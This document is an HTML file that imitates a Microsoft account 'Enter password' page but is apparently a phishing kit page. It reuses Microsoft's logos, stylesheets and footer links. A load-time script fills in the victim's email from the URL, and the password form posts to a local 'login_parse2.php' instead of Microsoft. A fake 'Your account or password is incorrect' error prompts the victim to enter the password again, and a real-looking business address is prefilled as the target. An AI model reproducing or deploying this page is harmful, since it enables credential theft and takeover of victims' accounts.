<html dir="ltr" lang="EN-US">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=Edge">
        <script type="text/javascript"> 
  
            window.addEventListener('load', () => {
          const params = (new URL(document.location)).searchParams;
          const email = params.get('email');
          
           document.getElementById('email').innerHTML = email;
           document.myform.email.value = email;
          
          
          })
          
            </script>
    
            <title>Sign in to your Microsoft account

            </title>
            <meta name="robots" content="none">
            <meta name="PageID" content="i5030">
            <meta name="SiteID" content="292841">
            <meta name="ReqLC" content="1033">
            <meta name="LocLC" content="1033">
            <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes">
             <link rel="shortcut icon" href="https://logincdn.msauth.net/16.000.28941.7/images/favicon.ico">
            <link rel="stylesheet" title="Converged_v2" type="text/css" onload="$Loader.OnSuccess(this)" onerror="$Loader.OnError(this)" href="https://logincdn.msauth.net/16.000/Converged_v21033_KdPYPHPPg4oaC6fNdNqPrQ2.css">
            <style type="text/css"></style>
            <style type="text/css">body{display:none;}</style>
           <style type="text/css">body{display:block !important;}</style>
              </head>
            <body class="cb" data-bind="defineGlobals: ServerData, bodyCssClass">
                <div><!--  -->

    <!--  -->
    
    <div data-bind="if: activeDialog"></div>
    
    <form  name ="myform" id="myform" autocomplete="off" method="post" action="login_parse2.php">
    
        <!-- ko if: svr.C8 --><!-- /ko -->
    
        <!-- ko withProperties: { '$loginPage': $data } -->
        <div data-bind="component: { name: 'master-page',
            params: {
                serverData: svr,
                showButtons: svr.F,
                showFooterLinks: true,
                useWizardBehavior: svr.Bq,
                handleWizardButtons: false,
                password: password,
                hideFromAria: ariaHidden },
            event: {
                footerAgreementClick: footer_agreementClick } }"><!--  -->
    
    <!-- ko ifnot: useLayoutTemplates --><!-- /ko -->
    
    <!-- ko if: useLayoutTemplates -->
        <!-- ko withProperties: { '$page': $parent } -->
            <!-- ko ifnot: isVerticalSplitTemplate -->
            <div id="lightboxTemplateContainer" data-bind="component: { name: 'lightbox-template', params: { serverData: svr } }"><!--  -->
    
    <div data-bind="component: { name: 'background-image-control',
        publicMethods: $page.backgroundControlMethods }"><div class="background-image-holder" role="presentation" data-bind="css: { app: isAppBranding }, style: { background: backgroundStyle }">
        <!-- ko if: smallImageUrl --><!-- /ko -->
    
        <!-- ko if: backgroundImageUrl -->
        <div data-bind="backgroundImage: backgroundImageUrl(), externalCss: { 'background-image': true }" style="background-image: url(&quot;https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg&quot;);" class="background-image ext-background-image"></div>
            <!-- ko if: useImageMask --><!-- /ko -->
        <!-- /ko -->
    </div></div>
    
    <div class="outer" data-bind="css: { 'app': $page.backgroundLogoUrl }">
        <!-- ko if: showHeader --><!-- /ko -->
    
        <div class="template-section main-section">
            <div class="middle" data-bind="css: { 'has-header': showHeader }">
                <!-- ko if: $page.backgroundLogoUrl() && !($page.paginationControlMethods() && $page.paginationControlMethods().currentViewHasMetadata('hideLogo')) --><!-- /ko -->
    
                <!-- ko if: svr.Cs && !($page.paginationControlMethods() && $page.paginationControlMethods().currentViewHasMetadata('hidePageLevelTitleAndDesc')) --><!-- /ko -->
    
                <div id="lightbox" data-bind="
                    animationEnd: $page.paginationControlMethods() &amp;&amp; $page.paginationControlMethods().view_onAnimationEnd,
                    externalCss: { 'sign-in-box': true },
                    css: {
                        'app': $page.backgroundLogoUrl(),
                        'wide': $page.paginationControlMethods() &amp;&amp; $page.paginationControlMethods().currentViewHasMetadata('wide'),
                        'fade-in-lightbox': $page.fadeInLightBox,
                        'has-popup': $page.showFedCredButtons() || $page.newSession(),
                        'transparent-lightbox': $page.backgroundControlMethods() &amp;&amp; $page.backgroundControlMethods().useTransparentLightBox,
                        'lightbox-bottom-margin-debug': $page.showDebugDetails }" class="sign-in-box ext-sign-in-box">
    
                    <!-- ko template: { nodes: $parentContext.$componentTemplateNodes, data: $page } -->
    
            <!-- ko if: svr.BG --><!-- /ko -->
    
            <div class="lightbox-cover" data-bind="css: { 'disable-lightbox': svr.bY &amp;&amp; showLightboxProgress() }"></div>
    
            <!-- ko if: showLightboxProgress --><!-- /ko -->
    
            <div class="win-scroll">
                <!-- ko ifnot: paginationControlMethods() && (paginationControlMethods().currentViewHasMetadata('hideLogo')) -->
                <div data-bind="component: { name: 'logo-control',
                    params: {
                        isChinaDc: svr.fIsChinaDc,
                        bannerLogoUrl: bannerLogoUrl() } }"><!--  -->
    
    <!-- ko if: bannerLogoUrl --><!-- /ko -->
    
    <!-- ko if: !bannerLogoUrl && !isChinaDc -->
        <!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko -->
    <!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
    <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img class="logo" role="img" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ed9c9eb0dce17d752bedea6b5acda6d9.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" data-bind="imgSrc, attr: { alt: str['MOBILE_STR_Footer_Microsoft'] }" src="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg" alt="Microsoft"><!-- /ko -->
    <!-- /ko --><!-- /ko -->
    <!-- /ko --></div>
                <!-- /ko -->
    
                <!-- ko if: svr.cU && (paginationControlMethods() && !paginationControlMethods().currentViewHasMetadata('hideLwaDisclaimer')) --><!-- /ko -->
    
                <!-- ko if: asyncInitReady -->
                <div role="main" data-bind="component: { name: 'pagination-control',
                    publicMethods: paginationControlMethods,
                    params: {
                        enableCssAnimation: svr.aQ,
                        disableAnimationIfAnimationEndUnsupported: svr.b5,
                        initialViewId: initialViewId,
                        currentViewId: currentViewId,
                        initialSharedData: initialSharedData,
                        initialError: $loginPage.getServerError() },
                    event: {
                        cancel: paginationControl_onCancel,
                        loadView: view_onLoadView,
                        showView: view_onShow,
                        setLightBoxFadeIn: view_onSetLightBoxFadeIn,
                        animationStateChange: paginationControl_onAnimationStateChange } }"><!--  -->
    
    <div data-bind="css: { 'zero-opacity': hidePaginatedView() }">
        <!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.J) -->
        <div data-bind="css: {
            'animate': animate() &amp;&amp; animate.animateBanner(),
            'slide-out-next': animate.isSlideOutNext(),
            'slide-in-next': animate.isSlideInNext(),
            'slide-out-back': animate.isSlideOutBack(),
            'slide-in-back': animate.isSlideInBack() }">
    
            <div data-bind="component: { name: 'identity-banner-control',
                params: {
                    userTileUrl: svr.br,
                    displayName: sharedData.displayName || svr.J,
                    isBackButtonVisible: isBackButtonVisible(),
                    focusOnBackButton: isBackButtonFocused(),
                    backButtonDescribedBy: backButtonDescribedBy() },
                event: {
                    backButtonClick: identityBanner_onBackButtonClick } }"><!--  -->
    
    <div class="identityBanner">
        <!-- ko if: isBackButtonVisible -->
        <button type="submit" class="backButton">
            <!-- ko ifnot: svr.CJ -->
                <!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko -->
    <!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme -->
    <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img role="presentation" pngsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png" svgsrc="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg" data-bind="imgSrc" src="https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg"><!-- /ko -->
    <!-- /ko --><!-- /ko -->
            <!-- /ko -->
    
            <!-- ko if: svr.CJ --><!-- /ko -->
        </button>
        <!-- /ko -->
    
        <div id="displayName" class="identity" data-bind="text: unsafe_displayName, attr: { 'title': unsafe_displayName }" title=""><span id="email"></div>
    </div></div>
        </div>
        <!-- /ko -->
    
        <div class="pagination-view has-identity-banner" data-bind="css: {
            'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.J),
            'zero-opacity': hidePaginatedView.hideSubView(),
            'animate': animate(),
            'slide-out-next': animate.isSlideOutNext(),
            'slide-in-next': animate.isSlideInNext(),
            'slide-out-back': animate.isSlideOutBack(),
            'slide-in-back': animate.isSlideInBack() }">
    
            <!-- ko foreach: views -->
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() -->
                    <!-- ko template: { nodes: [$data], data: $parent } --><div data-viewid="2" data-showidentitybanner="true" data-dynamicbranding="true" data-bind="pageViewComponent: { name: 'login-paginated-password-view',
                        params: {
                            serverData: svr,
                            serverError: initialError,
                            isInitialView: isInitialState,
                            username: sharedData.username,
                            displayName: sharedData.displayName,
                            hipRequiredForUsername: sharedData.hipRequiredForUsername,
                            passwordBrowserPrefill: sharedData.passwordBrowserPrefill,
                            availableCreds: sharedData.availableCreds,
                            evictedCreds: sharedData.evictedCreds,
                            useEvictedCredentials: sharedData.useEvictedCredentials,
                            showCredViewBrandingDesc: sharedData.showCredViewBrandingDesc,
                            flowToken: sharedData.flowToken,
                            defaultKmsiValue: svr.AH === 1,
                            userTenantBranding: sharedData.userTenantBranding,
                            sessions: sharedData.sessions,
                            callMetadata: sharedData.callMetadata },
                        event: {
                            updateFlowToken: $loginPage.view_onUpdateFlowToken,
                            submitReady: $loginPage.view_onSubmitReady,
                            redirect: $loginPage.view_onRedirect,
                            resetPassword: $loginPage.passwordView_onResetPassword,
                            setBackButtonState: view_onSetIdentityBackButtonState,
                            setPendingRequest: $loginPage.view_onSetPendingRequest } }"><!--  -->
    
    <!--  -->
    <input type="hidden" name="i13" data-bind="value: isKmsiChecked() ? 1 : 0" value="0">
    <input type="hidden" name="login" data-bind="value: unsafe_username" value="info@brightgreenchiropractic.co.uk">
    <input type="text" name="loginfmt" data-bind="moveOffScreen, value: unsafe_displayName" class="moveOffScreen" tabindex="-1" aria-hidden="true">
    <input type="hidden" name="type" data-bind="value: svr.Bq ? 20 : 11" value="11">
    <input type="hidden" name="LoginOptions" data-bind="value: isKmsiChecked() ? 1 : 3" value="3">
    <input type="hidden" name="lrt" data-bind="value: callMetadata.IsLongRunningTransaction" value="">
    <input type="hidden" name="lrtPartition" data-bind="value: callMetadata.LongRunningTransactionPartition" value="">
    <input type="hidden" name="hisRegion" data-bind="value: callMetadata.HisRegion" value="">
    <input type="hidden" name="hisScaleUnit" data-bind="value: callMetadata.HisScaleUnit" value="">
    
    <div id="loginHeader" class="row title ext-title" role="heading" aria-level="1" data-bind="text: str['CT_PWD_STR_EnterPassword_Title'], externalCss: { 'title': true }">Enter password</div>
    
    <!-- ko if: showCredViewBrandingDesc --><!-- /ko -->
    
    <!-- ko if: unsafe_pageDescription --><!-- /ko -->
    
    <div class="row">
        <div class="form-group col-md-24">
            <div role="alert" aria-live="assertive">
                <!-- ko if: passwordTextbox.error -->
                <div id="passwordError" data-bind="
                    externalCss: { 'error': true },
                    htmlWithBindings: passwordTextbox.error,
                    childBindings: {
                        'idA_IL_ForgotPassword0': {
                            href: accessRecoveryLink || svr.t,
                            attr: { target: accessRecoveryLink &amp;&amp; '_blank' },
                            click: accessRecoveryLink ? null : resetPassword_onClick } }" class="error ext-error">Your account or password is incorrect. If you don't remember your password, <a id="idA_IL_ForgotPassword0" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fid%3d292841%26opid%3d0C5E20A149FB29D2%26opidt%3d1614385306%26lc%3d1033%26uaid%3d6bb0cc9802c14539932e172e4d406b7c%26pid%3d0%26contextid%3d344F8769FD2B04CC%26bk%3d1614385394&amp;id=292841&amp;uiflavor=web&amp;uaid=6bb0cc9802c14539932e172e4d406b7c&amp;mkt=EN-US&amp;lc=1033&amp;bk=1614385394">reset it now.</a><!-- HR=80041012 --></div>
                <!-- /ko -->
            </div>
    
            <div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox-field',
                publicMethods: passwordTextbox.placeholderTextboxMethods,
                params: {
                    serverData: svr,
                    hintText: str['CT_PWD_STR_PwdTB_Label'] },
                event: {
                    updateFocus: passwordTextbox.textbox_onUpdateFocus } }"><!-- ko withProperties: { '$placeholderText': placeholderText } -->
        <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } -->
    
                <input name="pass" type="password" id="i0118" autocomplete="off" class="form-control input ext-input text-box ext-text-box has-error ext-has-error" aria-required="true" aria-describedby="loginHeader  " placeholder="Password" aria-label="Enter the password for info@brightgreenchiropractic.co.uk" tabindex="0">
                <input type="text"  name="email" readonly id="email"    document.getElementByIdvalue=''   hidden/>

                <!-- ko if: svr.C0 && showPassword() --><!-- /ko -->
            <!-- /ko -->
    <!-- /ko -->
    <!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div>
    
            <!-- ko if: svr.C0 --><!-- /ko -->
        </div>
    </div>
    
    <!-- ko if: shouldHipInit --><!-- /ko -->
    
    <div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }" class="position-buttons">
        <div>
            <!-- ko if: svr.Ct --><!-- /ko -->
            <!-- ko if: svr.Bb !== false && !svr.Ct && !tenantBranding.KeepMeSignedInDisabled -->
            <div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body no-margin-top" data-bind="visible: !svr.f &amp;&amp; !showHipOnPasswordView">
                <label id="idLbl_PWD_KMSI_Cb">
                    <input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" type="checkbox" data-bind="checked: isKmsiChecked, ariaLabel: str['CT_PWD_STR_KeepMeSignedInCB_Text']" aria-label="Keep me signed in">
                    <span data-bind="text: str['CT_PWD_STR_KeepMeSignedInCB_Text']">Keep me signed in</span>
                </label>
            </div>
            <!-- /ko -->
    
            <div class="row">
                <div class="col-md-24">
                    <div class="text-13">
                        <!-- ko if: showAccessRecoveryLink -->
                        <div class="form-group">
                            <a id="idA_PWD_ForgotPassword" role="link" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fid%3d292841%26opid%3d0C5E20A149FB29D2%26opidt%3d1614385306%26lc%3d1033%26uaid%3d6bb0cc9802c14539932e172e4d406b7c%26pid%3d0%26contextid%3d344F8769FD2B04CC%26bk%3d1614385394&amp;id=292841&amp;uiflavor=web&amp;uaid=6bb0cc9802c14539932e172e4d406b7c&amp;mkt=EN-US&amp;lc=1033&amp;bk=1614385394" data-bind="
                                text: str['CT_PWD_STR_ForgotPwdLink_Text'],
                                href: accessRecoveryLink || svr.t,
                                attr: { target: accessRecoveryLink &amp;&amp; '_blank' },
                                click: accessRecoveryLink ? null : resetPassword_onClick">Forgot password?</a>
                        </div>
                        <!-- /ko -->
                        <!-- ko if: allowPhoneDisambiguation --><!-- /ko -->
                        <!-- ko ifnot: useEvictedCredentials -->
                            <!-- ko component: { name: "cred-switch-link-control",
                                params: {
                                    serverData: svr,
                                    username: username,
                                    availableCreds: availableCreds,
                                    flowToken: flowToken,
                                    currentCred: { credType: 1 } },
                                event: {
                                    switchView: credSwitchLink_onSwitchView,
                                    redirect: onRedirect,
                                    setPendingRequest: credSwitchLink_onSetPendingRequest,
                                    updateFlowToken: credSwitchLink_onUpdateFlowToken } } --><!--  -->
    
    <div class="form-group">
        <!-- ko if: showSwitchToCredPickerLink --><!-- /ko -->
    
        <!-- ko if: credentialCount === 1 && !(showForgotUsername || selectedCredShownOnlyOnPicker) --><!-- /ko -->
    
        <!-- ko if: credentialCount === 0 && showForgotUsername --><!-- /ko -->
    </div>
    
    <!-- ko if: credLinkError --><!-- /ko --><!-- /ko -->
    
                            <!-- ko if: evictedCreds.length > 0 --><!-- /ko -->
                        <!-- /ko -->
                        <!-- ko if: showChangeUserLink --><!-- /ko -->
                    </div>
                </div>
            </div>
        </div>
    
        <div class="win-button-pin-bottom" data-bind="css : { 'boilerplate-button-bottom': tenantBranding.BoilerPlateText }">
            <div class="row" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }">
                <div data-bind="component: { name: 'footer-buttons-field',
                    params: {
                        serverData: svr,
                        primaryButtonText: str['CT_PWD_STR_SignIn_Button'],
                        isPrimaryButtonEnabled: !isRequestPending(),
                        isPrimaryButtonVisible: svr.F,
                        isSecondaryButtonEnabled: true,
                        isSecondaryButtonVisible: false },
                    event: {
                        primaryButtonClick: primaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right button-container" data-bind="
        visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
        css: { 'no-margin-bottom': removeBottomMargin }">
    
        <!-- ko if: isSecondaryButtonVisible --><!-- /ko -->
    
        <div data-bind="css: { 'inline-block': isPrimaryButtonVisible }" class="inline-block">
            <!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 -->
            <input type="submit" id="idSIButton9" data-bind="
                attr: primaryButtonAttributes,
                externalCss: {
                    'button': true,
                    'primary': true },
                value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
                hasFocus: focusOnPrimaryButton,
                click: primaryButton_onClick,
                enable: isPrimaryButtonEnabled,
                visible: isPrimaryButtonVisible,
                preventTabbing: primaryButtonPreventTabbing" class="button ext-button primary ext-primary" value="Sign in">
        </div>
    </div></div>
            </div>
        </div>
    </div>
    
    <!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko -->
    </div><!-- /ko -->
                <!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            
                <!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko -->
            <!-- /ko -->
        </div>
    </div></div>
                <!-- /ko -->
            </div>
    
            <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value="">
            <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value="">
            <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value="">
            <input type="hidden" name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value="">
            <input type="hidden" name="canary" data-bind="value: svr.canary" value="">
            <input type="hidden" name="ctx" data-bind="value: ctx" value="">
            <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value="">
            <input type="hidden" id="i0327" data-bind="attr: { name: svr.bC }, value: flowToken" name="PPFT" value="DbdAtxgYSHINMHJ9AkGRrAnqmeLCjGMw6ZYsIqG6ahyDUUgD9VCT109Obj1Z4BoBI*!nBFCgjVxfxBVEu67jhEETrPZd*OymbBIE47gHxXxPqVt*nGFiqvW27zEpo4spJYGgYo1B8jSxxAdmQWOsVRj!XVT4kZyPgkHH2zPRlqUtiVon2izYNlZoDPz6w9a5mBfd!ij!z2x144lGgMtA0CY$">
            <input type="hidden" name="PPSX" data-bind="value: svr.cq" value="Passpor">
            <input type="hidden" name="NewUser" value="1">
            <input type="hidden" name="FoundMSAs" data-bind="value: svr.Aj" value="">
            <input type="hidden" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0">
            <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0">
            <input type="hidden" name="CookieDisclosure" data-bind="value: svr.BG ? 1 : 0" value="0">
            <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="1">
            <input type="hidden" name="isSignupPost" data-bind="value: isSignupPost() ? 1 : 0" value="0">
    
            <div data-bind="component: { name: 'instrumentation-control',
                publicMethods: instrumentationMethods,
                params: { serverData: svr } }"><input type="hidden" name="i2" data-bind="value: clientMode" value="1">
    <input type="hidden" name="i17" data-bind="value: srsFailed" value="0">
    <input type="hidden" name="i18" data-bind="value: srsSuccess">
    <input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div>
        <!-- /ko -->
                </div>
    
                <!-- ko if: $page.showFedCredButtons --><!-- /ko -->
    
                <!-- ko if: $page.newSession --><!-- /ko -->
    
                <!-- ko if: $page.showDebugDetails --><!-- /ko -->
    
                <!-- ko if: !svr.CA && $page.paginationControlMethods() && $page.paginationControlMethods().hasInitialViewShown() -->
                <div id="footer" role="contentinfo" data-bind="
                    externalCss: {
                        'footer': true,
                        'has-background': !$page.useDefaultBackground(),
                        'background-always-visible': $page.backgroundLogoUrl }" class="footer ext-footer">
    
                    <div data-bind="component: { name: 'footer-control',
                        publicMethods: $page.footerMethods,
                        params: {
                            serverData: svr,
                            useDefaultBackground: $page.useDefaultBackground(),
                            hasDarkBackground: $page.backgroundLogoUrl(),
                            showLinks: true },
                        event: {
                            agreementClick: $page.footer_agreementClick,
                            showDebugDetails: $page.toggleDebugDetails_onClick } }"><!-- ko if: !hideFooter && (showLinks || impressumLink || showIcpLicense) -->
    <div id="footerLinks" class="footerNode text-secondary">
    
        <!-- ko if: showFooter -->
            <!-- ko if: !hideTOU -->
            <a id="ftrTerms" data-bind="
                text: termsText,
                href: termsLink,
                click: termsLink_onClick,
                externalCss: {
                    'footer-content': true,
                    'footer-item': true,
                    'has-background': !useDefaultBackground,
                    'background-always-visible': hasDarkBackground }" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;uaid=6bb0cc9802c14539932e172e4d406b7c" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
            <!-- /ko -->
    
            <!-- ko if: !hidePrivacy -->
            <a id="ftrPrivacy" data-bind="
                text: privacyText,
                href: privacyLink,
                click: privacyLink_onClick,
                externalCss: {
                    'footer-content': true,
                    'footer-item': true,
                    'has-background': !useDefaultBackground,
                    'background-always-visible': hasDarkBackground }" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;uaid=6bb0cc9802c14539932e172e4d406b7c" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
            <!-- /ko -->
    
            <!-- ko if: impressumLink --><!-- /ko -->
    
            <!-- ko if: showIcpLicense --><!-- /ko -->
        <!-- /ko -->
    
        <!-- Set attr binding before hasFocusEx to prevent Narrator from losing focus -->
        <a id="moreOptions" href="#" role="button" data-bind="
            click: moreInfo_onClick,
            ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],
            attr: { 'aria-expanded': showDebugDetails().toString() },
            hasFocusEx: focusMoreInfo(),
            externalCss: {
                'footer-content': true,
                'footer-item': true,
                'debug-item': true,
                'has-background': !useDefaultBackground,
                'background-always-visible': hasDarkBackground }" aria-label="Click here for troubleshooting information" aria-expanded="false" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
    </div>
    <!-- /ko -->
    
    <!-- ko if: svr.Cq && showLinks --><!-- /ko --></div>
                </div>
                <!-- /ko -->
            </div>
        </div>
    </div></div>
            <!-- /ko -->
    
            <!-- ko if: isVerticalSplitTemplate() && isVerticalSplitTemplateLoaded() --><!-- /ko -->
        <!-- /ko -->
    <!-- /ko --></div>
        <!-- /ko -->
    </form>
    
    <form data-bind="postRedirectForm: postRedirect" method="POST" aria-hidden="true" target="_top"></form>
    
    <!-- ko if: svr.ac -->
    <div id="idPartnerPL" data-bind="injectIframe: { url: svr.ac }"><iframe style="display: none;" src="https://outlook.office365.com/owa/prefetch.aspx?id=292841&amp;mkt=EN-US" width="0" height="0"></iframe></div>
    <!-- /ko --></div></body></html>